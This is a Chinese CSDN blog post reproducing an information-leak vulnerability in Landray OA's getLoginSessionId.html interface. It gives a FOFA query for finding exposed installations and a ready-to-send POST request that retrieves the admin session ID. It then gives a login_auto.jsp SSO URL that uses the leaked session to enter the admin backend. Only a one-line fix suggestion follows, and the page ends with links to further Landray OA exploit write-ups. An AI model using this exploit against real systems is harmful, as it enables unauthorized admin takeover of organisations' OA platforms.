蓝凌OA getLoginSessionId.html 信息泄露漏洞

已于 2023-12-19 17:21:44 修改
阅读量1.6k 收藏 10
点赞数 9
分类专栏: 漏洞复现 文章标签: html 前端 网络安全
于 2023-12-19 17:19:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luochen2436/article/details/135089437
版权

文章目录

产品简介

蓝凌核心产品EKP平台定位为新一代数字化生态OA平台,数字化向纵深发展,正加速构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化,赋能大中型组织更高效的内外协作与管理,支撑商业模式创新与转型发展

漏洞概述

蓝凌OA getLoginSessionId接口泄露session信息,导致攻击者可利用此漏洞进入到管理后台。

指纹识别

fofa:

app="Landray-OA系统"

漏洞利用

poc:

POST /api/sys-authentication/loginService/getLoginSessionId.html HTTP/1.1
Host: you_ip
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

loginName=admin

获取sessionId
在这里插入图片描述
利用泄露的session 使⽤sso登录到后台

http://you_ip/sys/authentication/sso/login_auto.jsp?sessionId=泄露的session

在这里插入图片描述

修复建议

对路径/api/sys-authentication/loginService/getLoginSessionId.html加入鉴权机制

【男女情爱,相互喜欢时,是圆圆镜,团团月。情伤过后,就是一锤碎出无数月,好像没那么喜欢了,但是记起更多。】

3tefanie丶zhou
关注
  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【1day】蓝凌OA 某接口敏感信息泄露漏洞学习
记录并分享学习安全的知识点..
12-07 741
蓝凌OA 系统某接口存在敏感信息泄露漏洞,攻击者通过漏洞可以获取到大量用户的信息,包括姓名、性别、手机号等信息。通过实施日志记录、审计和监控机制,监控系统和应用程序的访问、操作和事件,及时发现异常行为和潜在的信息泄露风险。4、教育和培训员工有关信息安全的最佳实践,增强他们对信息保护的意识和责任感。提供培训和指导,教育员工如何正确处理和保护敏感信息,减少信息泄露的风险。对敏感信息进行加密存储和传输,确保数据在存储和传输过程中的安全性。只授权合法用户访问敏感信息,并限制敏感信息的传输和复制。
蓝凌OA sysUiComponent 任意文件上传漏洞复现
0xSec
11-16 3114
蓝凌核心产品EKP平台定位为新一代数字化生态OA平台,数字化向纵深发展,正加速构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化,赋能大中型组织更高效的内外协作与管理,支撑商业模式创新与转型发展。蓝凌OA sysUiComponent接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩文件上传恶意后门文件,远程命令执行,获取服务器权限。
蓝凌OA-syszonepersoninfo-信息泄露_exp-漏洞复现
weixin_43167326的博客
01-20 1074
蓝凌OA是一款全面的企业管理软件,以知识管理为核心,致力于提升组织产能。其特点在于高度自定义、易用性和灵活扩展性。通过自定义功能和流程,蓝凌OA能够满足企业的个性化需求。同时,简单的界面和操作方式使得员工能够快速上手使用。蓝凌OA还注重知识管理,提供知识模板和知识库等功能,方便员工进行知识分享和学习。此外,蓝凌OA还提供丰富的。
蓝凌(Landray)OA漏洞常见RCE
baimao__Ch的博客
06-25 1077
背景是由于一次和友商共同的渗透项目测试中,其中一个系统使用了蓝凌OA,但当时由于一些原因觉得版本挺新应该是打了补丁的故在测试中没有仔细遍历复现蓝凌OA的历史常见RCE漏洞,后续对比了友商的报告发现别人测的两个RCE,故统一做个poc积累学习,混个眼熟防止下次渗透或攻防时漏掉。
【复现】蓝凌OA 信息泄露漏洞_35
fushuang333的博客
01-31 878
【复现】蓝凌OA 信息泄露漏洞蓝凌智能OA是由深圳市蓝凌软件股份有限公司开发,是一款针对中小企业的移动化智能办公产品,
1day 蓝凌OA EIS EKP 30多个漏洞合集(含payload利用)攻防必备漏洞
weixin_43167326的博客
06-24 1869
蓝凌OA是一款全面的企业管理软件,以知识管理为核心,致力于提升组织产能。其特点在于高度自定义、易用性和灵活扩展性。通过自定义功能和流程,蓝凌OA能够满足企业的个性化需求。同时,简单的界面和操作方式使得员工能够快速上手使用。蓝凌OA还注重知识管理,提供知识模板和知识库等功能,方便员工进行知识分享和学习。此外,蓝凌OA还提供丰富的。
蓝凌OA sysUiComponent 任意文件上传漏洞getshell(文末附批量检测poc)
安于心,修于形
12-26 1888
蓝凌OA sysUiComponent接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩文件上传恶意后门文件,远程命令执行,获取服务器权限。
蓝凌OA custom.jsp 任意文件读取漏洞批量扫描脚本.py
08-28
自己写的批量扫描脚本,很好用,可以借鉴一下
启动蓝凌OA项目的全步骤.md
07-11
公司用的oa项目的启动和初始化步骤。
蓝凌OA系统V15.0管理员手册.zip
07-08
蓝凌OA系统V15.0是一款针对企业日常办公自动化需求设计的高效管理工具,它为企业提供了一整套流程审批、文档管理、协同工作、信息门户等核心功能,旨在提升企业的办公效率,优化业务流程。作为系统管理员或运维人员...
蓝凌OA产品V14系统安装维护手册.chm
07-04
蓝凌OA产品V14系统安装维护手册.chm
蓝凌OA系统排名?蓝凌OA办公系统怎么选?什么是用户口碑最好的蓝凌OA系统?
04-13
提到OA选型,难免不会提到蓝凌蓝凌OA怎么样?蓝凌OA有哪些优缺点?蓝凌OA用户口碑怎么样? 想了解这些信息,您应该到选型宝,B2B的...关于蓝凌OA,以下信息来自选型宝最新发布的OA口碑选型报告,希望对您有帮助。
蓝凌OA 文件Copy导致远程代码执行漏洞复现(XVE-2023-18344)
最新发布
0xSec
07-18 1147
​由于蓝凌OA代码功能模块设计缺陷问题,攻击者可以利用文件复制的方式,将后台脚本功能模块文件复制到无需权限认证的目录下,导致未经过身份认证的攻击者利用后台脚本执行模块,远程命令执行,写入后门文件并获取服务器权限。
蓝凌OA存在任意文件读取漏洞
nnn2188185的博客
06-15 539
蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业,近期Landray-OA系统被爆出存任意文件读取漏洞和后台rce
登陆后,地址栏中有sessionid
wangjun5159的专栏
05-04 5871
情景登陆后,地址栏偶尔会出现sessionid,这是为什么呢? 解释为什么会出现?根本原因是服务器对url进行了地址重写; 分析过程 第一次登陆请求时,请求头中没有cookie,服务器端会以为客户端禁用了cookie,再者由于是302重定向,需要返回新地址,所以会对地址进行重写,重写后的地址都会带着sessionid。 我们可以通过curl模拟请求来查看, 为什么偶尔出现,出现的次数不多?
漏洞复现】 蓝凌OA treexml.tmpl 远程命令执行漏洞
qq_34914659的博客
06-14 3267
漏洞复现】 蓝凌OA treexml.tmpl 远程命令执行漏洞
蓝凌OA-sysuicomponent-任意文件上传_exp-漏洞复现
weixin_43167326的博客
01-20 565
蓝凌OA是一款全面的企业管理软件,以知识管理为核心,致力于提升组织产能。其特点在于高度自定义、易用性和灵活扩展性。通过自定义功能和流程,蓝凌OA能够满足企业的个性化需求。同时,简单的界面和操作方式使得员工能够快速上手使用。蓝凌OA还注重知识管理,提供知识模板和知识库等功能,方便员工进行知识分享和学习。此外,蓝凌OA还提供丰富的。
蓝凌OA SSRF漏洞
11-15
根据您提供的引用内容,我可以为您回答关于蓝凌OA SSRF漏洞的问题。 蓝凌OA是一款企业级办公自动化软件,由于其在设计上存在一些安全漏洞,因此被黑客利用进行攻击。其中,SSRF漏洞蓝凌OA中的一种常见漏洞类型。SSRF漏洞是指攻击者可以通过构造恶意请求,使服务器发起对内部网络中其他服务的请求,从而实现攻击的目的。 具体来说,攻击者可以通过构造恶意请求,使蓝凌OA服务器向攻击者指定的URL地址发起请求,从而获取攻击者想要的信息。攻击者可以利用这个漏洞获取服务器内部的敏感信息,或者进一步利用该漏洞进行攻击。 为了防止蓝凌OA SSRF漏洞的攻击,建议管理员及时更新蓝凌OA的补丁,并对蓝凌OA进行安全加固。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值